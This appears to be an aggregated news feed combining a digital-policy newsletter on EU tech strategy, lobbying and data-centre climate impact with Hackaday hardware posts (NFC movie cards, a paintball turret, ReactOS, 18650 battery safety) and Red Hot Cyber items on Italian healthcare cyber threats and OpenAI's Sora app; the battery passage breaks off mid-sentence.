— The European Union's AI strategy is re-living mistakes of previous shifts in global technology; Domestic US politics overshadow the global attacks on online safety laws; The consequences of Big Tech's pullback on political ad transparency is a hit to free speech. More here.
— Social media is no longer 'social.' That requires a rethink about how these platforms are overseen; How US tech companies are balancing domestic and international pledges on 'digital sovereignty;' Most governments don't have a plan to combat disinformation. More here.
— Get ready for the rise of a 'digital age of minority;' AI-powered deepfakes are getting harder to detect — even if they have yet to affect democratic elections; The global "AI Stack" is quickly consolidating around a select few firms. More here.
— The case for why everyone should double down on social media oversight despite the growing hype around artificial intelligence. More here.

Yet at their core, both countries are seeking to take a more hands-on approach to digital policymaking that focuses on digital public infrastructure, incentives tied to public tenders for technology contracts and greater government support for domestic companies to compete on the global stage. That could include nudging ministries to use local alternatives to American cloud providers like AWS or Google. It may involve government support for startups to hire the best talent and access new European (and global) markets. It could see officials actively embedding themselves in industrial policy decisions so that more high-end technology is built in Europe — as part of growing public support to wean the bloc off a perceived reliance on US Big Tech giants.

There's still uncertainty about what the communiqué that will arise from the Nov 18 event will say. US officials have been doing the rounds in EU capitals (and not just in Berlin and Paris) to warn national officials against promoting an "anti-American" slant in whatever Europe decides to do with its digital sovereignty ambitions. But, at its core, the summit will be dedicated to placing governments and policymakers at the center of digital policymaking changes to jumpstart the bloc's economy.

Contrast that with what the European Commission is slated to announce a day later on Nov 19 (though that date has yet to be officially confirmed). As part of the Digital Omnibus, expect a slate of announcements to pare back Europe's digital rulebook in the name of economic growth.

There are rumors that parts of the AI Act will be shelved. I don't think that will happen. Instead, my bet is on a more protracted roll-out of the world's only comprehensive legislation for the emerging technology, aimed at giving European firms more time to figure out their AI strategies. I would argue that few of these firms will be affected by the most stringent parts of the AI Act. But Henna Virkkunen, the European Commission's vice-president for technology sovereignty, security and democracy, has made it clear that her priority when it comes to AI is generating growth, not cumbersome regulation.

In other parts of the upcoming Digital Omnibus, we'll also likely see further retrenchment from Europe's vaunted world-class digital regulation. This will be framed as unleashing the bloc's economic potential by making it easier for small- and medium-sized enterprises to sell their wares globally without falling afoul of the perceived excesses of digital regulation. Europe's privacy rules, in particular, will likely come under scrutiny because of the misunderstanding that such rules have made it harder for small firms to compete. For bigger European firms, that is certainly true. But I have seen little evidence to suggest that tough data protection rules, when implemented correctly, lead to burdensome oversight for smaller companies, almost all of which do not have to comply with the most stringent of oversight.

EU policymakers argue the dual events this month go hand-in-hand. That you can have a more top-down industrial policy directed by national leaders and an effort to reduce the digital regulatory burden to unleash the Continent's economic potential.

I don't buy that.

First, Europe needs to define what it wants out of its digital sovereignty agenda that remains divided between EU member countries' diverging interests and an inability to craft a coherent policymaking agenda when global competitors like the US and China are quickly moving ahead. Yes, the bloc is not a country, and such decisions are inherently slow. But Brussels has had more than five years to conjure up a digital sovereignty ethos, and it has failed to do so.

Second, the perception driven home by Draghi's competitiveness report that all digital regulation is harmful to the economy fundamentally misunderstands how Europe's digital economy works. It's not GDPR or the soon-to-be slow-rolled AI Act that is holding back Portugal or Sweden. It's the endemic failure of generations of EU policymakers to create a functioning digital single market that can allow European companies to leverage Continent-wide talent and financial resources.

Reining back digital rules may play into the politics of late 2025 when national leaders all want to <<checks talking points>> unleash the potential of AI onto society. But the Digital Omnibus will fail to grapple with the EU's underlying structural challenges that remain the main driver for why the bloc is third in the three-person race with China and the US on technology.

Until national leaders and policymakers clearly link their digital sovereignty ambitions with a well-thought-out strategy toward digital rulemaking, Europe's also-ran status is unlikely to change.

The two events later this month represent a missed opportunity to bring the dueling strategies — one pushing for greater government intervention, the other calling for less regulatory oversight — into one coherent message. That could have included finally articulating a forward-looking digital sovereignty agenda focused on competitiveness, social cohesion and the promotion of Europe's fundamental values, at home and abroad.

Instead, the Nov 18 summit and the Nov 19 announcement will likely stand in contrast to one another as a sign that, again, the EU has failed to meet the opportunity presented by the US (the world's largest democratic power) pulling back from the global stage.


Chart of the week


LOBBYING IN BRUSSELS HAS NEVER BEEN at the same scale as what happens in Washington. In part, that's because the EU is not as transparent in forcing companies to disclose what they spend annually to nudge lawmakers in one way or another.

Still, tech companies have increased their collective lobbying spend by roughly one-third, to $174 million, in the latest 12-month period compared to 2023, according to figures collected by Corporate Europe Observatory and LobbyControl, two advocacy groups.

Below is the breakdown of the top spenders within the digital industry. It's not surprising that many on the list continue to face significant regulatory headwinds despite Brussels calming down on its appetite for more tech rules.
(Chart: the top lobbying spenders within the digital industry. Source: Corporate Europe Observatory; LobbyControl; EU Transparency Register)


TECH INDUSTRY AND CLIMATE CHANGE


THE UNITED NATIONS ANNUAL CLIMATE CHANGE CONFERENCE will take place in Belém, Brazil from Nov 10-Nov 21. The outlook does not look good. As a lapsed climate change reporter, I find it hard not to look at the current data and weep. The ten warmest years on record have all occurred between 2015-2024, according to data from the US NOAA National Centers for Environmental Information. Last year was the warmest year since global records began in 1850.

Yikes.

The tech industry, especially those firms powering the datacenter boom, must take responsibility for some of the current climate crisis.

Electricity consumption associated with datacenters, for instance, is expected to more than double by 2030, based on estimates from the International Energy Agency. By the end of the decade, these facilities, whose expansion is directly tied to the AI boom currently engulfing the world, will need as much electricity, as a sector, as Japan, the world's fourth largest economy, consumes today.

Again, yikes.

Some of this datacenter boom will be powered by renewable energy like geothermal power. But in countries from Ireland to Chile, local residents are protesting the building of these facilities because of fears — and realities — that the new construction will either lead to rolling electricity blackouts or hikes in energy bills that will disproportionately harm lower income families.

The climate change risks are not just limited to electricity generation.

On everything from lithium battery production for electric vehicles to the waste produced by consumer electronic devices, the tech industry's effect on the wider environment cannot be overstated. Yes, there are larger emitters, especially those associated with heavy industry and transport. But for a sector known for generating record profits (and now representing roughly a third of the overall market capitalization of the S&P 500 Index), the tech industry has significant cash stockpiles to address its climate change impact.


Some firms have started to do so. Many of the world's largest tech companies have best-in-class carbon offsetting programs and have invested billions in the reduction of so-called e-waste created by their consumer products. Still, it's not enough.

As national leaders and policymakers gather in Brazil for what is likely to be a damp squib of a climate conference, it's a reminder of the growing disconnect between the tech industry's climate change footprint and its ability to play a major role in averting the most harmful environmental impact — especially when 2024 was the first calendar year when the average global temperature exceeded 1.5°C above its pre-industrial levels.

Expect many of the companies to send representatives to Belém. It's a potentially good news story for some already investing in greener versions of tech infrastructure. But with total investment in data centers, alone, expected to hit almost $600 billion this year, it's hard to reconcile the growing carbon footprint of just one part of the tech industry and the stated green ambitions of the firms behind the current tech boom.


What I'm reading:


— Ahead of the upcoming social media ban for minors in Australia, the government conducted a feasibility study into whether it could implement so-called "age assurance" across the country. The results are here.

— The US Senate held another hearing into unproven claims that Big Tech companies worked with the federal government to censor mostly right-wing voices. Here's the transcript.

— The European Commission published its work plan for 2026, including major tech regulatory pushes like the Digital Fairness Act. More here.

— More than 70 countries signed the United Nations Cybercrime Convention on Oct 25 that had been criticized for failing to uphold basic fundamental rights. You can read the treaty here.

— Academics from Oxford University outlined a potential pathway for bringing together the ways countries oversee artificial intelligence. More here.



digitalpolitics.co/newsletter0…


CardFlix: NFC Cards for Kid-Friendly Streaming Magic


For most of us, the days of having to insert a disc to play our media are increasingly behind us. But if you’d like to provide your kids with the experience, you could use CardFlix.

For the electronics, [Udi] used the readily available ESP8266 D1 Mini module connected via I2C to a PN532 NFC reader. To trigger the different movies, there are over 50 cards, each with its own unique NFC tag and a small poster that [Udi] printed showing the show, then laminated to ensure it survives plenty of use. The D1 Mini and NFC reader are housed in a 3D printed case, which ends up being almost smaller than the 5V DC adapter powering it, allowing it to be mounted above an outlet out of the way. The deck of movie cards is also housed in a pair of printed boxes: a larger one for the whole collection and a small one for the most often used shows. Should you want to print your own, all the design files are provided in the write-up.

The D1 Mini was programmed using ESPHome. This firmware allows it to easily connect back to Home Assistant, which does most of the heavy lifting for this project. When a card is scanned, Home Assistant can tell which TV the scanner was near, allowing this system to be used in more than one location. It also knows which card was scanned so it can play the right movie. Home Assistant also handles ensuring the TV in question is powered on, as well as figuring out what service should be called for that particular movie to be shown.
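The glue logic is simple enough to sketch in plain Python against Home Assistant's REST API, though the actual project does this with ESPHome tag events and HA automations; the token, entity ID, and UID-to-movie table below are assumptions for illustration.

# Sketch of the Home Assistant side: map a scanned tag UID to a movie
# and ask HA to play it on a given TV. Token/entity/table are placeholders.
import requests

HA = "http://homeassistant.local:8123"
TOKEN = "LONG_LIVED_ACCESS_TOKEN"                      # placeholder
MOVIES = {"04:a2:3b:11": "media-source://media/frozen.mkv"}  # UID -> media

def on_tag(uid: str, tv_entity: str = "media_player.living_room_tv"):
    media = MOVIES.get(uid)
    if media is None:
        return                                          # unknown card
    requests.post(
        f"{HA}/api/services/media_player/play_media",   # HA REST service call
        headers={"Authorization": f"Bearer {TOKEN}"},
        json={"entity_id": tv_entity,
              "media_content_id": media,
              "media_content_type": "movie"},
        timeout=5,
    )

on_tag("04:a2:3b:11")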

Be sure to check out some of the other projects we’ve featured that use ESPHome to automate tasks.

youtube.com/embed/_sqxoAX3GW0?…


hackaday.com/2025/11/05/cardfl…


Audio Sound Capture Project Needs Help


Audio field emission map

When you are capturing audio from a speaker, you are rarely capturing the actual direct output of such a system. There are reflections and artifacts caused by anything and everything in the environment that make it to whatever detector you might be using. With the modern computation age, you would think there would be a way to compensate for such artifacts, and this is what [d.fapinov] set out to do.

[d.fapinov] has put together a code base for simulating and reversing environmental audio artifacts, made to rival systems costing orders of magnitude more. It relies on principles similar to those used in radio antenna analysis, computing the audio output map through a technique called spherical harmonic expansion. Once this map is calculated and separated from outside influence, you can truly measure the output of an audio device.
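The core idea is to treat each microphone position as a sample of a function on the sphere and fit harmonic coefficients by least squares. Here is a self-contained Python sketch of that step, with the order, directions, and test data as stand-ins rather than anything from [d.fapinov]'s code base.

# Fit spherical-harmonic coefficients to sound pressure sampled at known
# microphone directions around the source (illustrative data only).
import numpy as np
from scipy.special import sph_harm

N_ORDER = 3                      # max harmonic order (assumption)

def design_matrix(theta, phi):
    # One column per (n, m) pair: Y_n^m evaluated at each mic direction.
    cols = [sph_harm(m, n, theta, phi)
            for n in range(N_ORDER + 1) for m in range(-n, n + 1)]
    return np.stack(cols, axis=1)

# Fake measurement: 64 random directions, pressure from a simple dipole.
rng = np.random.default_rng(0)
theta = rng.uniform(0, 2 * np.pi, 64)     # azimuth
phi = np.arccos(rng.uniform(-1, 1, 64))   # polar angle
pressure = np.cos(phi) + 0.1 * rng.standard_normal(64)

Y = design_matrix(theta, phi)
coeffs, *_ = np.linalg.lstsq(Y, pressure.astype(complex), rcond=None)
print(np.round(np.abs(coeffs), 3))        # energy should land on Y_1^0

With the coefficients in hand, the field can be re-evaluated at any angle, which is what lets the room's reflections be separated from the speaker's own radiation pattern.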

The only problem is that the project needs to be tested in the real world. [d.fapinov] has gotten this far but is unable to continue with the project. A way to measure audio from precise locations around the output is required, as well as the appropriate control for such a device.

Audio enthusiasts go deep into this tech, and if you want to become one of them, check out this article on audio compression and distortion.


hackaday.com/2025/11/05/audio-…


The Threat to the Italian Healthcare Sector


The Agenzia per la Cybersicurezza Nazionale (ACN) has updated its report on cyber risk in the healthcare sector, covering the period from January 2023 to September 2025, with new data, analysis, and recommendations.

🧠The reason is that the healthcare sector, globally, continues to be among the hardest hit by cyber attacks. Since January 2023 there have been, on average, 4.3 cyber attacks per month against healthcare facilities. About half of these resulted in incidents with a real impact on the services delivered (in terms of availability and confidentiality), sometimes bringing services to a halt, with serious repercussions for users and risks to patient privacy.

👉 From January to September 2025, the overall number of cyber events rose by about 40% compared to the same period in 2024: CSIRT Italia recorded 60 events against the 42 seen the previous year. The number of incidents, however, fell: 23 versus 47 in 2024, a year in which a single supply-chain attack caused 31 incidents across as many organizations.

👉 Among the main threat types observed in the first nine months of 2025 are active scanning targeting credentials, phishing, e-mail account compromise, and data exposure. This confirms the centrality of the e-mail vector and of social-engineering techniques in spreading malicious campaigns. Ransomware attacks declined in 2025, but they remain the threat type with the highest impact.

🛡The report highlights that many cyber attacks succeed because the most basic cybersecurity measures are often neglected or poorly implemented, compounded by a lack of specific training for staff in hospitals, medical centers, clinics, and other healthcare facilities.
To counter these vulnerabilities, ACN offers targeted recommendations, including the need to implement robust security practices and centralized cybersecurity governance. A programmatic approach, based on risk management and separation of roles, is essential to strengthen the security of healthcare systems and prevent cyber incidents.

Read the report


dicorinto.it/agenzia-per-la-cy…


OpenAI Releases the Sora Mobile App on Android, Available in Several Countries


OpenAI has released the Sora mobile app for Android devices. CNBC reported that OpenAI’s Sora app is now available for download from the Google Play store in the United States, Canada, Japan, Taiwan, Thailand, and Vietnam, as well as South Korea.

Sora launched this past September and passed 1 million downloads in under five days, holding the top spot on Apple’s App Store for three weeks. It currently sits fifth among Apple’s free apps, with ChatGPT first and Google Gemini fourth, a sign of the continuing dominance of AI-based apps.

OpenAI is currently working to make Sora available for download in Europe, Bill Peebles, head of Sora at OpenAI, wrote on the social network X.

OpenAI has described Sora as “the next step in multimodal generation,” combining the ability to understand natural language with the ability to produce coherent images and motion in a visual context. Born as a research platform, the app has quickly become a mass phenomenon, with millions of users creating short, realistic videos from simple text descriptions.

Sora’s interface resembles that of the most popular social networks: a vertical feed of user-generated videos that can be “remixed,” commented on, and shared. According to many analysts, OpenAI is aiming to turn Sora not just into a video-generation tool but into a full creative ecosystem capable of competing with platforms like TikTok and Instagram Reels.

The ability to produce visual content of near-cinematic quality, without technical skills or professional software, has generated enthusiasm but also concern.

Several organizations have flagged the risks tied to deepfake creation and the spread of potentially deceptive synthetic content. OpenAI says it has introduced digital watermarks and C2PA metadata to identify Sora-generated videos, and has implemented controls to prevent abuse of the platform.

The article OpenAI rilascia l’APP Mobile di Sora su Android, disponibile in vari paesi originally appeared on Red Hot Cyber.


Does Microsoft Use macOS to Create Windows Wallpapers? Probably Yes!


On October 29, Microsoft released a wallpaper commemorating the eleventh anniversary of the “Windows Insider” program, and there is speculation that it was created using macOS.

Recall that Windows Insider is an official program launched by Microsoft in 2014 that lets users preview new versions of Windows before their public release.

Members, called “Insiders,” receive experimental updates, features still in development, and non-final builds of the operating system, contributing feedback and bug reports to improve the software.

The program is open to anyone with a Microsoft account and is split into several channels (Canary, Dev, Beta, and Release Preview) offering different levels of stability and novelty. In essence, it is a global community of testers and enthusiasts who help Microsoft refine Windows, often seeing features months before they reach the official releases.

The commemorative wallpaper was published on the Microsoft Design account on X and is available in two colors, dark and light, and in two sizes; four wallpapers are included in the zip file. You can download them from the Microsoft Design wallpapers page.

However, once the zip file was extracted, a folder named “__MACOSX” appeared: this folder is generated when a file is compressed using macOS’s built-in archiving feature.

That led some users to ask: “Is Microsoft using macOS to create a Windows wallpaper?”
Microsoft Design’s tweet celebrating 11 years of “Windows Insider”
The “__MACOSX” folder holds the metadata macOS uses to store settings for the folder’s contents, which indicates that macOS was used at least for the compression step.

It is not clear whether macOS was actually used to create the wallpaper itself, but macOS is widely used in design work and is probably also used by Windows graphic designers to produce artwork for Microsoft environments.
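Anyone can run the same check the sharp-eyed users did, without even extracting the archive; a quick Python sketch (the file name is a placeholder):

# Does a zip carry the __MACOSX entries that macOS's built-in archiver
# adds? zipfile.namelist() reads the index without extracting anything.
import zipfile

with zipfile.ZipFile("wallpapers.zip") as z:      # placeholder path
    mac_entries = [n for n in z.namelist() if n.startswith("__MACOSX/")]

if mac_entries:
    print(f"Compressed on macOS: {len(mac_entries)} __MACOSX entries")
else:
    print("No __MACOSX entries found")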
The “Windows Insider Program 11th Anniversary” zip file, downloaded from the Microsoft Design site, opened
It would seem a little ironic if a commemorative Windows wallpaper had been created using macOS.

We cannot be certain of this, but everything suggests that is exactly what happened.

The article Microsoft usa macOS per creare gli sfondi di Windows? Probabilmente si! originally appeared on Red Hot Cyber.


X-wing Aircraft Are Trickier Than They Look


The iconic X-wing ship design from Star Wars is something many a hobbyist has tried to recreate, and not always with success. While [German engineer] succeeded in re-imagining an FPV quadcopter as an X-wing fighter, the process also highlighted why there have been more failures than successes when it comes to DIY X-wing aircraft.

For one thing, the X-wing shape is not particularly aerodynamic. It doesn’t make a very good airplane. Quadcopters on the other hand rely entirely on precise motor control to defy gravity in a controlled way. It occurred to [German engineer] that if one tilts their head just so, an X-wing fighter bears a passing resemblance to a rocket-style quadcopter layout, so he set out to CAD up a workable design.
When flying at speed, the aircraft goes nearly horizontal and the resemblance to an X-wing fighter is complete.
One idea that seemed ideal but ultimately didn’t work was using four EDF (electric ducted fan) motors mounted in the same locations as the four cylindrical engines on an X-wing. Motors large enough to fly simply wouldn’t fit without ruining the whole look. A workable alternative ended up being the four props and brushless motors mounted on the ends of the wings, like you see here.

The unit still needed a lot of fine tuning to get to a properly workable state, but it got there. It takes off and lands vertically, like a classical quadcopter, but when flying at speed it levels out almost completely and looks just like an X-wing as it screams by. It’s in sharp contrast to the slow, methodical movements of this Imperial Shuttle drone.

There are also a couple design elements in [German engineer]’s build we thought were notable. The spring-loaded battery door (all 3D-printed, including the spring) looks handy and keeps the lines of the aircraft clean. And since it’s intended to be flown as an FPV (first person view) aircraft, the tilting camera mount in the nose swings the camera 90 degrees during takeoff and landing to make things a little easier on the pilot.

3D models for the frame (along with a parts list) are up for anyone who wants to give it a shot. Check it out in the video, embedded below.

youtube.com/embed/ocwTty_xnuc?…


hackaday.com/2025/11/04/x-wing…


The Headache of Fake 74LS Logic Chips


When you go on your favorite cheap online shopping platform and order a batch of 74LS logic ICs, what do you get? Most likely relabeled 74HC ICs, if the results of an AliExpress order by [More Fun Fixing It] on YouTube are anything to judge by. Despite the claims made by the somewhat suspect markings on the ICs, even the cheap component tester used immediately identified them as 74HC parts.

Why is this a problem, you might ask? Simply put, 74LS are Low-power Schottky chips using TTL logic levels, whereas 74HC are High-Speed CMOS, using CMOS logic levels. If these faked chips had used 74HCT, they would have been compatible with TTL logic levels, but with the TTL vs CMOS levels mismatch of 74HC, you are asking for trouble.

CMOS inputs typically require a high level of at least 70% of Vcc and a low of at most 30% of Vcc, whereas a TTL-level high is only guaranteed to be somewhere above 2.0 V. 74HC also cannot drive its outputs as strongly as 74LS, which opens another can of potential issues. Meanwhile, HCT can be substituted for LS, but with the same lower drive current, which may or may not be an issue.
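A quick sanity check makes the mismatch obvious. The following Python sketch compares typical 5 V datasheet figures; the exact numbers vary by part, so treat them as illustrative.

# Does a driver's guaranteed output high/low reach the receiver's input
# thresholds? Typical 5 V datasheet values; check your own parts.
VCC = 5.0
FAMILIES = {                   # (V_OH min, V_OL max, V_IH min, V_IL max)
    "74LS":  (2.7, 0.5, 2.0, 0.8),
    "74HC":  (4.4, 0.33, 0.7 * VCC, 0.3 * VCC),
    "74HCT": (4.4, 0.33, 2.0, 0.8),
}

def check(driver, receiver):
    voh, vol, _, _ = FAMILIES[driver]
    _, _, vih, vil = FAMILIES[receiver]
    ok = voh >= vih and vol <= vil
    print(f"{driver} -> {receiver}: "
          f"{'OK' if ok else 'FAILS'} (needs >= {vih} V high, gets {voh} V)")

check("74LS", "74HC")    # FAILS: 2.7 V < 3.5 V, the faked-chip problem
check("74LS", "74HCT")   # OK: HCT inputs accept TTL levels

With Vcc at 5 V, a 74LS output guaranteeing only 2.7 V high falls well short of the 3.5 V a 74HC input demands, which is exactly why the relabeled chips cause intermittent grief.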

Interestingly, when the AliExpress seller was contacted with these findings, a refund was issued practically immediately. This makes one wonder why exactly faked 74LS ICs are even being sold, when they’d most likely be stuffed into old home computers by presumably hardware enthusiasts with a modicum of skill and knowledge.

youtube.com/embed/yoV9hWPngzI?…


hackaday.com/2025/11/04/the-he…


A Paintball Turret Controlled Via Xbox Controller


Video games, movies, and modern militaries are all full of robotic gun turrets that allow for remotely-controlled carnage. [Paul Junkin] decided to build his own, albeit in a less-destructive paint-hurling fashion.

The turret sits upon a lazy susan bearing mounted atop an aluminium extrusion frame. A large gear is mounted to the bearing, allowing the turret to pan when driven by a stepper motor. A pair of pillow block bearings hold a horizontal shaft which mounts the two paint markers, and a second stepper motor drives this shaft to move in the tilt axis. An ESP32 microcontroller is responsible for running the show, panning and tilting the platform by commanding the large stepper motors. Firing the paintball markers is achieved with solenoids mounted on the triggers, which cycle fast enough to make the semi-auto markers fire in a way that almost feels like full-auto. Commands come from an Xbox One controller, which communicates with the ESP32 over Bluetooth using the BluePad32 library.
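The interesting firmware problem in a build like this is mapping stick position to motion. Here is a hedged Python sketch of one common approach (a deadzone plus a squared response for fine aiming); the axis range matches what BluePad32 roughly reports, but all constants are assumptions rather than [Paul Junkin]'s values.

# Map a gamepad stick value to a signed stepper step rate, with a
# deadzone so the turret holds still at center. Constants are assumed.
AXIS_MAX = 512
DEADZONE = 40          # ignore stick noise near center
MAX_SPS = 1200         # max steps per second (assumption)

def axis_to_step_rate(axis: int) -> float:
    if abs(axis) < DEADZONE:
        return 0.0
    span = AXIS_MAX - DEADZONE
    mag = (abs(axis) - DEADZONE) / span           # 0..1 past the deadzone
    rate = (mag ** 2) * MAX_SPS                   # squared for fine aim
    return rate if axis > 0 else -rate

for v in (-512, -100, 0, 60, 511):
    print(v, round(axis_to_step_rate(v)))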

It’s worth noting you shouldn’t shoot paintballs at unsuspecting individuals, since they can do extreme amounts of damage to those not wearing the proper protection. We’ve featured a great many other sentry guns over the years, too, like this impressive Portal-themed build. Video after the break.

youtube.com/embed/UVgqzoGp9NQ?…


hackaday.com/2025/11/04/a-pain…


Print in Place Pump Pushes Limits of Printing


Print in place pump being used next to ladder

3D printing has put fabrication in the hands of almost anyone who wants something quick and easy. No more messing around with machining or complex assembly. However, given the generally hands-off nature of most 3D prints, what could be possible with a little more intervention during the printing process? [Ben] from Designed to Make demonstrates this perfectly with an entire centrifugal pump printed as one.

This project may not fit the strictest sense of “print in place”; however, the entire pump is printed as one print file. The catch is the steps taken during printing, where a bearing is placed and a couple of filament changes are made to allow dissolvable supports to be printed. Once these supports are dissolved away, the body is coated with epoxy to prevent any leakage.

Testing done by [Ben] showed more than impressive numbers from the experimental device. Compared to previous designs made to test impeller features, the all-in-one pump could hold its own in most categories.

If you want to check out the project yourself, check out the Hackaday project here. One of the greatest parts of the open source 3D printing world is the absolute freedom and ingenuity that comes out of it, and this project is no exception. For more innovations, check out this DIY full color 3D printing!

youtube.com/embed/HDBhGS5r62c?…


hackaday.com/2025/11/04/print-…


2025 Component Abuse Challenge: Weigh With A TL074


The late and lamented [Bob Pease] was one of a select band of engineers, each of whose authority in the field of analogue integrated circuit design was at the peak of the art. So when he remarks on something in his books, it’s worth taking notice. It was just such an observation that caught the eye of [Trashtronic]; that the pressure on a precision op-amp from curing resin could be enough to change the device’s offset voltage. Could this property be used for something? The op-amp as a load cell was born!

The result is something of an op-amp torture device, resembling a small weighing machine with a couple of DIP-8 packages bearing the load. Surprisingly modest weights will change the offset voltage, though it was found that the value will drift over time.

This is clearly an experimental project and not a practical load cell, but it captures the essence of the 2025 Component Abuse Challenge of which it forms a part. Finding completely unexpected properties of components doesn’t always have to lead to useful results, and we’re glad someone had done this one just to find out whether or not it works. You still just about have time for an entry yourself if you fancy giving it a go.

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/11/04/2025-c…


Jenny’s Daily Drivers: ReactOS 0.4.15


When picking operating systems for a closer look here in the Daily Drivers series, the aim has not been to merely pick the next well-known Linux distro off the pile, but to try out the interesting, esoteric or minority OS. The need remains to use it as a daily driver though, so each one we try has to have at least some chance of being a useful everyday environment in which a Hackaday piece could be written. With some of them such as the then-current BSD or Slackware versions we tried for interest’s sake a while back that’s not a surprising achievement, but for the minority operating systems it’s quite a thing. Today’s choice, ReactOS 0.4.15, is among the closest we’ve come so far to that ideal.

For The N’th Time In The Last 20 Years, I Download A ReactOS ISO

A Windows-style ReactOS desktop with a web browser showing Hackaday. It’s fair to say there are still a few quirks, but it works.
ReactOS is an open-source clone of a Windows operating system from the early 2000s, having a lot in common with Windows XP. It started in the late 1990s and has slowly progressed ever since, making periodic releases that, bit by bit, have grown into a usable whole. I last looked at it for Hackaday with version 0.4.13 in 2020, so have five years made any difference? Time to download that ISO and give it a go.

Installing ReactOS has that bright blue and yellow screen feeling of a Windows install from around the millennium, but I found it to be surprisingly quick and pain free despite a few messages about unidentified hardware. The display driver it chose was a VESA one but since it supported all my monitor’s resolutions and colour depths that’s not the hardship it might once have been.

Once installed, the feeling is completely of a Windows desktop from that era except for the little ReactOS logo on the Start menu. I chose the classic Windows 95 style theme as I never liked the blue of Windows XP. Everything sits where you remember it and has the familiar names, and if you used a Microsoft computer in those days you’re immediately at home. There’s even a web browser, but since it’s the WINE version of Internet Explorer and dates from the Ark, we’re guessing you’ll want to replace it.

Most Of The Old Software You Might Need…

A Windows-like ReactOS desktop with the GIMP graphics package. Hello GIMP 2.6, my old friend!
There’s a package manager to download and run open-source software, something which naturally Windows never had. Back in 2020 I found this to be the Achilles’ heel of the OS, with very little able to install and run without crashing, so I was very pleased to note that this situation has changed. Much of the software is out of date due to needing Windows XP compatibility, but I found it to be much more usable and stable. There’s a choice of web browsers: the Firefox and Chromium versions are too old to be useful, but the K-Meleon version is the most recent of the bunch. Adding GIMP to my installed list, I was ready to try this OS as my daily driver.

I am very pleased to report that using K-Meleon and GIMP on ReactOS 0.4.15, I could do my work as a Hackaday writer and editor. This piece was in part written using it, and Hackaday’s WordPress backend is just the same as in Firefox on my everyday Manjaro Linux machine. There however the good news ends, because I’m sorry to report that the experience was at times a little slow and painful. Perhaps that’s the non-up-to-date hardware I’d installed it on, but it’s evident that 2025 tasks are a little taxing for an OS with its roots in 2003. That said it remained a usable experience, and I could just about do my job were I marooned on a desert island with my creaking old laptop and ReactOS.

… And It Works, Too!


So ReactOS 0.4.15 is a palpable hit, an OS that can indeed be a Daily Driver. It’s been a long time, but at last ReactOS seems mature enough to use. I have to admit that I won’t be making the switch though, but who should be thinking about it? I think perhaps back in 2020 I got it right, in suggesting that as a pretty good facsimile of Windows XP it is best thought of as an OS for people who need XP but for whom the venerable OS is now less convenient. It’s more than just a retrocomputing platform; instead it’s a supported alternative to the abandonware original for anyone with hardware or software from that era which still needs to run. Just as FreeDOS is now the go-to place for people who need DOS, so, if they continue on this trajectory, should ReactOS become for those needing a classic Windows. Given the still-installed rump of software and computer-controlled machinery which runs XP, that could, I think, become a really useful niche to occupy.


hackaday.com/2025/11/04/jennys…


Rocket Roll Control, The Old Fashioned Way


The vast majority of model rockets go vaguely up and float vaguely downwards without a lot of control. However, [newaysfactory] built a few rockets that were altogether more precise in their flight, thanks to his efforts to master active roll control.

[newaysfactory] started this work a long time ago, well before Arduinos, ESP32s, and other highly capable microcontroller platforms were on the market. In an era when you had to very much roll your own gear from the ground up, he whipped up a rocket control system based around a Microchip PIC18F2553. He paired it with a L3G4200D gyro, an MPXH6115A barometer, and an MMA2202KEG accelerometer, chosen for its ability to provide useful readings under high G acceleration. He then explains how these sensor outputs were knitted together to keep a rocket flying straight and true under active control.
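While the write-up doesn't publish the loop itself, the usual recipe with this sensor set is to integrate the gyro's roll rate into an angle and close a PD loop around it. Here is a minimal Python sketch of that idea; the loop rate, gains, and limits are assumptions for illustration, not [newaysfactory]'s values.

# Roll control sketch: integrate gyro rate to an angle, then a PD loop
# commands the fins. All constants are illustrative assumptions.
DT = 0.004          # 250 Hz control loop (assumption)
KP, KD = 2.0, 0.15  # PD gains (assumptions)

roll_deg = 0.0      # integrated roll angle

def roll_step(gyro_dps: float) -> float:
    """Feed one gyro sample (deg/s); returns fin deflection command (deg)."""
    global roll_deg
    roll_deg += gyro_dps * DT                 # integrate rate -> angle
    command = -(KP * roll_deg + KD * gyro_dps)
    return max(-15.0, min(15.0, command))     # fin travel limit (assumption)

# A disturbance kicks the rocket to 30 deg/s; watch the controller respond.
for sample in (30.0, 28.0, 25.0, 20.0):
    print(round(roll_step(sample), 2))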

[newaysfactory] didn’t just master roll control for small rockets; he ended up leveraging this work into a real career working on fully-fledged autopilot systems. Sometimes your personal projects can take your career in interesting directions.

youtube.com/embed/AFb85zKAyqU?…


hackaday.com/2025/11/04/rocket…


Lithium-Ion Batteries: WHY They Demand Respect


This summer, we saw the WHY (What Hackers Yearn) event happen in the Netherlands, of course, with a badge to match. Many badges these days embrace the QWERTY computer aesthetic, which I’m personally genuinely happy about. This one used 18650 batteries for power, in a dual parallel cell configuration… Oh snap, that’s my favourite LiIon cell in my favourite configuration, too! Surely, nothing bad could happen?

Whoops. That one almost caught me by surprise, I have to shamefully admit. I just genuinely love 18650 cells, in all the glory they bring to hardware hacking, and my excitement must’ve blinded me. They’re the closest possible entity to a “LiIon battery module”, surprisingly easy to find in most corners of this planet, cheap to acquire in large quantities, easy to interface to your projects, and packing a huge amount of power. It’s a perfect cell for many applications that I, and many other hackers, hold dear.

Sadly, the 18650 cells were a bad choice for the WHY badge, for multiple reasons at once. If you’re considering building an 18650-based project, or even a product, let me show you exactly what made these cells a bad fit, and how you might be able to work around those limitations on your own journey. There are plenty of technical factors, but I will also tell you about the social factors, because those create the real dealbreaker here.

Three Thousand Participants


The main social factor can be boiled down to this – an 18650-powered WHY badge can start a fire through being touched by a 5-cent coin, a keychain, or a metal zipper of someone’s jacket. This is not a dealbreaker for an individual hacker who’s conscious of the risk, though it’s certainly an unwise choice. For three thousand participants? You have no chance.

An 18650 cell is like a bigger sister to an AA battery – power at your fingertips, just, you’re playing with heaps more power. You can take an 18650 cell and have it power a small yet nimble robot on wheels, or an ultra-powerful flashlight, or a handheld radio packing quite a transmit power punch. You can release its power by accident, too, and that gets nasty quick.

Short-circuiting an 18650 cell is a surprisingly straightforward way to melt metal, and by extension, start a small fire. It’s also not that hard to short-circuit an 18650 cell, especially and specifically an unprotected one. This is a big part of why consumer-oriented gadgets use AAs instead of 18650s – a less powerful cell, perhaps, but also a significantly less dangerous one.
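To put rough numbers on that, here is a back-of-envelope estimate, assuming an unprotected cell with an internal resistance of around 30 mΩ (real cells vary considerably):

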